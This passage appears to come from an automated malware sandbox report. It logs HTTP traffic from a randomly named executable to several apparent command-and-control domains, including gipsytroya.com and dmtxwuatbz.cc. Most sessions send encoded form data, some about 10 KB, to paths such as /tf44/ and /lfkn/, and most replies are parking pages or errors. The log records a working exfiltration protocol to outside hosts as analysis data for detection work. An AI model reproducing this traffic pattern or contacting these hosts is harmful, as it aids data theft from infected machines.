                Data Ascii: ">Typo 3 zeichnet sich durch seine hohe Flexibilit&auml;t und zahlreiche Erweiterungen aus. Ganz einfach &uuml;ber Ihr Hosting Control Panel zu installieren. </td></tr></table></td><td><table><tr><td colspan="2"><h2>Das Domaintechnik.at Affili
                Aug 23, 2024 04:20:57.531040907 CEST5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                28192.168.2.449765213.145.228.16802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:20:59.346244097 CEST512OUTGET /aroo/?bB7L5=DPt0-rQpMXpt&AZOTcfex=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.sandranoll.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:21:00.064162016 CEST1236INHTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:20:59 GMT
                Server: Apache/2.4.61 (Debian)
                X-Powered-By: PHP/7.4.33
                Strict-Transport-Security: max-age=63072000; preload
                Connection: Upgrade, close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: 38 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED]
                Data Ascii: 885<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                Aug 23, 2024 04:21:00.064182997 CEST1236INData Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e
                Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
                Aug 23, 2024 04:21:00.064198971 CEST1184INData Raw: 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 68 32 3e 44 61 73 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 41 66 66 69 6c 69 61 74 65 20 50 72 6f 67 72 61 6d 6d 3c 2f 68 32 3e 3c 2f 74 64 3e 3c 2f
                Data Ascii: <table><tr><td colspan="2"><h2>Das Domaintechnik.at Affiliate Programm</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;width:75px;height:75px" src="https://www.domaintechnik.at/fileadmin/gfx/icons/partner
                Aug 23, 2024 04:21:00.068008900 CEST5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                29192.168.2.44976691.195.240.19802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:21:05.202802896 CEST778OUTPOST /tf44/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.gipsytroya.com
                Origin: http://www.gipsytroya.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.gipsytroya.com/tf44/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 37 6c 2f 32 47 70 41 55 34 73 54 41 75 68 36 59 41 37 77 46 6f 6e 4a 54 76 38 6f 59 51 47 65 36 58 43 4e 4e 6b 34 4e 58 4a 33 32 59 45 4b 4d 36 46 57 54 69 64 68 43 34 58 4d 64 47 76 2f 5a 77 37 68 6b 37 35 49 2f 4b 32 76 76 7a 45 65 59 46 42 35 6e 51 48 78 4b 50 6c 45 41 36 45 31 69 30 66 32 4e 66 48 69 53 49 71 44 59 58 38 63 69 4f 48 6a 2f 36 52 54 61 53 64 39 67 67 42 54 30 71 4f 39 56 4d 6d 73 31 39 66 64 4a 43 58 38 67 39 68 72 75 63 50 72 33 51 6f 75 6c 75 53 52 53 43 32 72 47 68 71 41 71 43 46 56 67 67 6c 37 78 72 47 6b 34 65 41 67 3d 3d
                Data Ascii: AZOTcfex=+FKgbPBnyVok7l/2GpAU4sTAuh6YA7wFonJTv8oYQGe6XCNNk4NXJ32YEKM6FWTidhC4XMdGv/Zw7hk75I/K2vvzEeYFB5nQHxKPlEA6E1i0f2NfHiSIqDYX8ciOHj/6RTaSd9ggBT0qO9VMms19fdJCX8g9hrucPr3QouluSRSC2rGhqAqCFVggl7xrGk4eAg==
                Aug 23, 2024 04:21:05.837100983 CEST707INHTTP/1.1 405 Not Allowed
                date: Fri, 23 Aug 2024 02:21:05 GMT
                content-type: text/html
                content-length: 556
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                30192.168.2.44976791.195.240.19802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:21:07.737508059 CEST798OUTPOST /tf44/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.gipsytroya.com
                Origin: http://www.gipsytroya.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.gipsytroya.com/tf44/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 31 71 36 58 69 39 4e 6c 35 4e 58 4b 33 32 59 63 36 4d 46 4c 32 54 70 64 68 4f 77 58 4a 39 47 76 2f 39 77 37 6c 67 37 35 2f 44 4a 33 2f 76 39 64 4f 59 48 63 70 6e 51 48 78 4b 50 6c 45 6c 76 45 7a 4b 30 66 69 4a 66 57 32 47 4c 6d 6a 59 57 35 73 69 4f 57 7a 2f 2b 52 54 61 67 64 2f 46 46 42 52 38 71 4f 38 6c 4d 6e 39 31 2b 57 64 4a 45 61 63 68 4a 6f 5a 72 33 47 71 2b 61 6d 39 78 4b 64 69 2b 63 36 4e 58 37 37 78 4c 56 58 56 45 54 34 38 34 66 4c 6e 46 58 62 6b 76 46 64 6f 5a 2b 54 33 4d 4c 36 57 4d 37 49 30 70 49 4a 4a 77 3d
                Data Ascii: AZOTcfex=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX1q6Xi9Nl5NXK32Yc6MFL2TpdhOwXJ9Gv/9w7lg75/DJ3/v9dOYHcpnQHxKPlElvEzK0fiJfW2GLmjYW5siOWz/+RTagd/FFBR8qO8lMn91+WdJEachJoZr3Gq+am9xKdi+c6NX77xLVXVET484fLnFXbkvFdoZ+T3ML6WM7I0pIJJw=
                Aug 23, 2024 04:21:08.371984959 CEST707INHTTP/1.1 405 Not Allowed
                date: Fri, 23 Aug 2024 02:21:08 GMT
                content-type: text/html
                content-length: 556
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                31192.168.2.44976891.195.240.19802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:21:10.275573015 CEST10880OUTPOST /tf44/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.gipsytroya.com
                Origin: http://www.gipsytroya.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.gipsytroya.com/tf44/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 30 53 36 58 78 31 4e 6b 61 56 58 4c 33 32 59 43 4b 4d 45 4c 32 54 30 64 6c 69 4b 58 4a 35 57 76 39 31 77 36 47 34 37 2f 4f 44 4a 2b 2f 76 39 41 65 59 47 42 35 6d 4b 48 77 36 31 6c 45 31 76 45 7a 4b 30 66 6a 35 66 57 69 53 4c 6b 6a 59 58 38 63 69 43 48 6a 2f 57 52 51 72 56 64 2f 42 2f 43 69 45 71 4f 63 31 4d 6c 50 74 2b 64 64 4a 47 4a 73 68 52 6f 59 58 6f 47 75 57 34 6d 38 31 30 64 68 69 63 72 4d 72 69 6d 54 44 42 4e 31 4e 4f 72 64 49 70 50 56 39 57 65 48 7a 46 51 64 46 59 47 57 77 64 30 32 39 7a 53 52 39 4a 63 4a 32 2b 37 41 38 69 6d 54 53 4a 6e 47 4d 59 56 30 2f 65 76 49 79 58 6d 37 6e 4d 54 39 6c 50 76 5a 39 65 5a 38 4c 75 4d 43 6d 59 36 4b 30 57 55 33 58 31 33 71 79 73 43 61 45 46 2f 34 76 59 78 72 41 49 64 59 31 6c 4f 56 52 48 31 4f 48 49 54 4c 44 34 61 4a 5a 6e 46 6b 4e 59 36 4a 52 73 63 52 67 71 6f 45 30 4b 48 41 77 36 6d 49 4c 31 47 6c 30 79 44 [TRUNCATED]
                Data Ascii: AZOTcfex=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX0S6Xx1NkaVXL32YCKMEL2T0dliKXJ5Wv91w6G47/ODJ+/v9AeYGB5mKHw61lE1vEzK0fj5fWiSLkjYX8ciCHj/WRQrVd/B/CiEqOc1MlPt+ddJGJshRoYXoGuW4m810dhicrMrimTDBN1NOrdIpPV9WeHzFQdFYGWwd029zSR9JcJ2+7A8imTSJnGMYV0/evIyXm7nMT9lPvZ9eZ8LuMCmY6K0WU3X13qysCaEF/4vYxrAIdY1lOVRH1OHITLD4aJZnFkNY6JRscRgqoE0KHAw6mIL1Gl0yDGTKvVgTBRnEyILfJ7GonCuCHn8OczepwOWW7WbCsvI3gPJK4ogHgBbZoMNFyBJVZy51HmU5chAg6EaSOauaR5X8Y4vO4FxKMAh1kY4l5OeInFjFhRwDC7LVRKQtaJzhs4rM7axpX6La/OZCaQ/LFXneh5VUIZ1YEJMNdRKVUxCXnv/u/uswFS0L5N8X8FfdMW9Sm9hWCOiXy7WD7/E/IiJRHXNvWECeH8mBZQmk+fMvwltu5m4bKWfqWdZIWeqQGFz+9BOLI4Cy8ArfItxOk9qtVhZ9h+yp7S4RRRW4PXlhWNNSXfmQfq9L3il3dUMME9CIdEW945wdRoTcd1bPINPriv7nYtjl6m1WuZhrqzkDXlNPiHkvr4jNim86EYR9EEyigX/0pJF7J/2zfvRMrlsWPMm7ar0/LLAAoHF6MQ3OszwGhEA7IyGYR7SPN5iP0fRV54d/KBxfLBWahuh+B/P0HEDYcKaMUUHBrcDcS1Y6ZGjd6i0jIuTa94bnexK2eFKcjKSJl52ZGlKK1NP9MhA5cipobQs1HOeFJonxDbx/OC2w8BbOAU5YQltez3Nl59P5iP14ReIbUtABDOlYPILTgLBe0ECeScv78RD6vjmuxXxmdsZX32ccwlqZ6MU0hHVV1Z6MHPYIlrHG9MnOS/njgIAAxKeXsw6 [TRUNCATED]
                Aug 23, 2024 04:21:10.901503086 CEST707INHTTP/1.1 405 Not Allowed
                date: Fri, 23 Aug 2024 02:21:10 GMT
                content-type: text/html
                content-length: 556
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                32192.168.2.44976991.195.240.19802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:21:12.805797100 CEST512OUTGET /tf44/?AZOTcfex=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&bB7L5=DPt0-rQpMXpt HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.gipsytroya.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:21:13.440695047 CEST113INHTTP/1.1 439
                date: Fri, 23 Aug 2024 02:21:13 GMT
                content-length: 0
                server: Parking/1.0
                connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                33192.168.2.449770172.67.210.102802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:21:26.554316044 CEST775OUTPOST /lfkn/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.dmtxwuatbz.cc
                Origin: http://www.dmtxwuatbz.cc
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.dmtxwuatbz.cc/lfkn/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 48 55 48 78 52 38 59 45 36 38 77 4a 39 6f 58 65 47 77 6b 44 6e 52 69 4f 31 63 73 42 36 62 39 77 30 77 32 4e 35 37 46 30 41 63 67 51 67 52 6d 34 48 70 41 58 39 31 65 61 76 6d 4c 6c 2f 2b 50 42 66 75 45 39 51 5a 77 35 6a 43 42 32 76 7a 5a 30 6e 33 69 67 2f 79 66 76 61 43 37 4d 63 41 51 2b 7a 61 4e 4c 46 30 57 47 43 32 75 65 5a 44 76 58 77 71 6b 46 61 44 58 77 54 49 6b 4e 57 58 77 50 4d 35 48 6e 78 67 45 50 6c 44 2f 30 51 6a 74 72 35 34 79 44 7a 51 6a 6d 74 6d 37 50 4f 64 61 34 4f 77 70 6f 47 51 67 33 59 65 2f 37 2f 66 7a 54 32 5a 31 41 51 3d 3d
                Data Ascii: AZOTcfex=tsf8FNiIpLuGJHUHxR8YE68wJ9oXeGwkDnRiO1csB6b9w0w2N57F0AcgQgRm4HpAX91eavmLl/+PBfuE9QZw5jCB2vzZ0n3ig/yfvaC7McAQ+zaNLF0WGC2ueZDvXwqkFaDXwTIkNWXwPM5HnxgEPlD/0Qjtr54yDzQjmtm7POda4OwpoGQg3Ye/7/fzT2Z1AQ==


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                34192.168.2.449771172.67.210.102802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:21:29.095901966 CEST795OUTPOST /lfkn/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.dmtxwuatbz.cc
                Origin: http://www.dmtxwuatbz.cc
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.dmtxwuatbz.cc/lfkn/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 76 39 77 56 41 32 4b 34 37 46 7a 41 63 67 59 41 52 76 38 48 70 39 58 39 78 67 61 74 43 4c 6c 2b 65 50 42 66 65 45 39 6e 4e 7a 34 7a 43 50 69 66 7a 66 77 6e 33 69 67 2f 79 66 76 61 47 46 4d 64 6f 51 69 53 71 4e 5a 55 30 56 61 79 32 68 49 4a 44 76 47 67 71 34 46 61 44 6c 77 58 41 43 4e 56 76 77 50 4f 78 48 6e 67 67 62 42 6c 44 35 71 67 69 76 69 35 64 51 42 44 5a 6f 6e 39 72 56 41 4d 4e 75 77 6f 68 7a 35 33 78 33 6c 59 36 4d 6d 34 57 48 65 31 6b 38 62 54 64 68 77 31 6a 70 2b 74 6f 76 4c 7a 44 76 79 2b 6e 43 43 62 6b 3d
                Data Ascii: AZOTcfex=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAIv9wVA2K47FzAcgYARv8Hp9X9xgatCLl+ePBfeE9nNz4zCPifzfwn3ig/yfvaGFMdoQiSqNZU0Vay2hIJDvGgq4FaDlwXACNVvwPOxHnggbBlD5qgivi5dQBDZon9rVAMNuwohz53x3lY6Mm4WHe1k8bTdhw1jp+tovLzDvy+nCCbk=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                35192.168.2.449772172.67.210.102802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:21:31.634447098 CEST10877OUTPOST /lfkn/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.dmtxwuatbz.cc
                Origin: http://www.dmtxwuatbz.cc
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.dmtxwuatbz.cc/lfkn/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 33 39 77 6e 49 32 4b 62 44 46 79 41 63 67 57 67 52 69 38 48 70 73 58 35 64 61 61 74 4f 62 6c 36 75 50 42 39 57 45 37 53 78 7a 32 7a 43 50 67 66 7a 61 30 6e 33 4e 67 2f 69 41 76 62 32 46 4d 64 6f 51 69 51 69 4e 61 46 30 56 4a 69 32 75 65 5a 44 7a 58 77 71 45 46 65 6d 51 77 58 4e 2f 4e 6b 50 77 50 75 68 48 6c 53 34 62 4a 6c 44 37 72 67 69 4e 69 35 68 6d 42 44 46 43 6e 2b 32 4f 41 4f 52 75 79 38 73 52 6c 7a 42 30 2f 4b 6d 76 6d 34 61 30 66 6d 45 36 58 45 56 48 2b 41 7a 76 68 65 49 57 44 78 7a 6b 33 4c 72 57 54 62 4a 75 77 70 38 33 5a 33 4e 4f 59 62 77 38 72 33 58 44 71 41 45 78 63 73 4e 6e 51 6d 55 76 